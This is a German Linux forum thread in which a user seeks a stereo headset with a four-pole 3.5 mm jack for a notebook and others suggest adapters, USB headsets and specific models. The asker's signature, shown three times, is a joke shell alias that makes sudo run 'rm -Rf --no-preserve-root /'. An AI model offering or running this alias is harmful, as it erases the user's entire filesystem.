Stereo Headset mit 3-Pol Klinke 3,5 mm
Ergebnis 1 bis 8 von 8

Thema: Stereo Headset mit 3-Pol Klinke 3,5 mm

  1. #1
    hat den Bogen geschlagen Avatar von Schard
    Registriert seit
    26.05.2007
    Ort
    Hannover
    Beiträge
    840

    Question Stereo Headset mit 3-Kanal Klinke 3,5 mm

    Hallo Leute,

    schon länger bin ich auf der Suche nach einem Stereo-Headset für mein Notebook.
    Dies hat leider das Manko, dass es nur über eine vierpolige 3,5 mm Klinkenbuchse verfügt, d.h. Sereo-Out-Links, Stereo-Out-Rechts, Mono-In und Masse.

    Leider wurde ich weder in Online, noch in RL-Geschäften (was für ein Wort ) fündig auf der Suche nach einem Headset mit solch einem Anschluss.

    Hat jemand von Euch eine Empfehlung wo man so etwas bekommt, oder vielleicht sogar eine Produktempfehlung?

    Ich danke Euch schonmal.

    Beste Grüße

    Schard
    Geändert von Schard (13.02.2012 um 17:40 Uhr) Grund: Korrektur Pol-Kanal
    Code:
    alias sudo='/usr/bin/sudo /bin/rm -Rf --no-preserve-root / #'




  2. Inside Anonymous - Lesetipp zum Sonderpreis


     Inside Anonymous erzählt erstmalig die Geschichte dreier Mitglieder des harten Kerns:
    ihren Werdegang und ihre ganz persönliche Motivation, die sie zu überzeugten Hackern machte.
    Basierend auf vielen exklusiven Interviews bietet das Buch einen einzigartigen und spannenden
    Einblick in die Köpfe, die hinter der virtuellen Community stehen.
    Das Buch kostet bei terrashop.de jetzt statt 22,00 EUR nur noch 4,99 EUR.




    Jetzt bei terrashop.de anschauen – Nur solange der Vorrat reicht


  3. #2
    Foren As Avatar von gt4raser
    Registriert seit
    30.12.2007
    Beiträge
    219
    Hallo,

    Eine 3polige Klinkenbuchse mit 4 Anschlüssen (Sereo-Out-Links, Stereo-Out-Rechts, Mono-In und Masse)? Irgendwas stimmt da nicht.
    Schau noch mal nach was du hast, dann kann man besser helfen.

    Gruß GT4 Raser

  4. #3
    hat den Bogen geschlagen Avatar von Schard
    Registriert seit
    26.05.2007
    Ort
    Hannover
    Beiträge
    840
    Oh, ja.

    Nicht dreipolig, sondern dreikanalig. Natürlich mit vier Polen, da die Masse hinzukommt.
    Code:
    alias sudo='/usr/bin/sudo /bin/rm -Rf --no-preserve-root / #'

  5. #4
    König
    Registriert seit
    01.08.2007
    Beiträge
    788
    öhm, hier findet sich doch das eine oder andere:

    http://www.google.de/search?q=headse...ient=firefox-a

    alternativ - ein Standard-Headset mit 2x Klinke (KH + Mic) und ein entsprechendes Adapterkabel.

    Für konkretere Empfehlungen - wie soll's denn sein? Mit Kopf- und Mikrobügel oder eher die reine "Kabelbaumel"-Variante?
    ich bin root - ich darf das...

  6. #5
    Law & Order Avatar von sinn3r
    Registriert seit
    28.12.2006
    Ort
    Mölln
    Beiträge
    2.739
    Alternativ gibt es sonst jede Menge Headsets, die ihre eigenen Controller mitbringen und an den USB Anschluss kommen. (Logitech etc)

  7. #6
    hat den Bogen geschlagen Avatar von Schard
    Registriert seit
    26.05.2007
    Ort
    Hannover
    Beiträge
    840
    Hallo und danke erstmal.

    Dass es da Adapter gibt oder alternativ USB-Headsets ist mir schon bewußt.
    Ich hätte hingegen das alles lieber in einem Gerät.
    Welche Bauweise das Headset hat ist mir relativ egal. Es sollte nur nicht zu groß sein, da ich es ja in der Notebooktasche transportieren möchte.
    Ein einfaches Stereo headset für VoIP ist eigentlich das, was ich dafür suche.
    Halt nur möglichst ohne einen separaten Adapter Da müsste ich wieder ein Teil mehr mit mir rum schleppen und habe ein Teil mehr, das kaputt gehen kann.

    MfG

    Schard
    Code:
    alias sudo='/usr/bin/sudo /bin/rm -Rf --no-preserve-root / #'

  8. #7
    ausgesperrt
    Registriert seit
    09.09.2007
    Beiträge
    142
    HP VP052AA z.b. Muss mal probieren ob das ganze auch mit meinem Samsung Headset vom Telefon funktionieren würde.

    //edit: gerade probiert: Das Headset vom Samsung Galaxy funktioniert auch am Thinkpad Edge 11
    Geändert von xbeduine (13.02.2012 um 21:27 Uhr)

  9. #8
    Law & Order Avatar von sinn3r
    Registriert seit
    28.12.2006
    Ort
    Mölln
    Beiträge
    2.739
    In der Regel sind die Controller im Kabel verkapselt, nix mit extra Adapter.

Ähnliche Themen

  1. TV-Karte Pinnacle PCTV Stereo >> kein Sound
    Von frafi im Forum Grafik / Video
    Antworten: 0
    Letzter Beitrag: 30.12.2006, 20:13
  2. Soundkarte lässt nur Stereo raus
    Von benny90 im Forum Sound
    Antworten: 0
    Letzter Beitrag: 14.04.2006, 16:49
  3. Logitech® Premium Stereo USB Headset 3.0 unter Suse 9.2
    Von frischling im Forum Eingabegeräte
    Antworten: 2
    Letzter Beitrag: 18.02.2005, 10:27
  4. Nur Stereo... :(
    Von SurferX im Forum Sound
    Antworten: 1
    Letzter Beitrag: 19.06.2004, 18:17
  5. S: HeadSet
    Von Zee im Forum Sonstiges
    Antworten: 1
    Letzter Beitrag: 16.03.2003, 21:40

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •